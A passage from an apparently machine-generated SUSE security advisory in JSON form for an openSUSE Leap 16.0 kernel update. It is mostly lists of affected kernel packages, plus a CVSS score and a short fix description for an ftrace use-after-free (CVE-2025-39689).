"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-38645"
},
{
"cve": "CVE-2025-39689",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-39689"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nftrace: Also allocate and copy hash for reading of filter files\n\nCurrently the reader of set_ftrace_filter and set_ftrace_notrace just adds\nthe pointer to the global tracer hash to its iterator. Unlike the writer\nthat allocates a copy of the hash, the reader keeps the pointer to the\nfilter hashes. This is problematic because this pointer is static across\nfunction calls that release the locks that can update the global tracer\nhashes. This can cause UAF and similar bugs.\n\nAllocate and copy the hash for reading the filter files like it is done\nfor the writers. This not only fixes UAF bugs, but also makes the code a\nbit simpler as it doesn\u0027t have to differentiate when to free the\niterator\u0027s hash between writers and readers.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
